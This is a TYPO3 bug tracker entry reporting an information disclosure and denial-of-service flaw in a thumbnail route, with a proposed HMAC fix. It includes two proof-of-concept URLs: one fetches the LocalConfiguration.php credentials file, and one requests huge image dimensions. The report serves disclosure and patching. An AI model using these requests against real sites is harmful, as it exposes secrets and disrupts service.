Bug #85875
Updated by Oliver Hader about 6 years ago
* information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage) * denial of service (dimensions, basically whole configuration can be arbitrary) Introduced in https://review.typo3.org/#/c/56765/ - not released yet to 9.4.0 nor 8.7.19 Solution: Add HMAC to all HTTP request parameters. h2. PoC XSRF Token has to be adjusted in the links below h3. h2. Information Disclosure <pre> http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731 &fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64 &processingInstructions%5Bheight%5D=64c &processingInstructions%5Bcrop%5D= </pre> h3. h2. Denial of Service <pre> http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731 &fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png &processingInstructions%5Bwidth%5D=1000000 &processingInstructions%5Bheight%5D=1000000c &processingInstructions%5Bcrop%5D= </pre>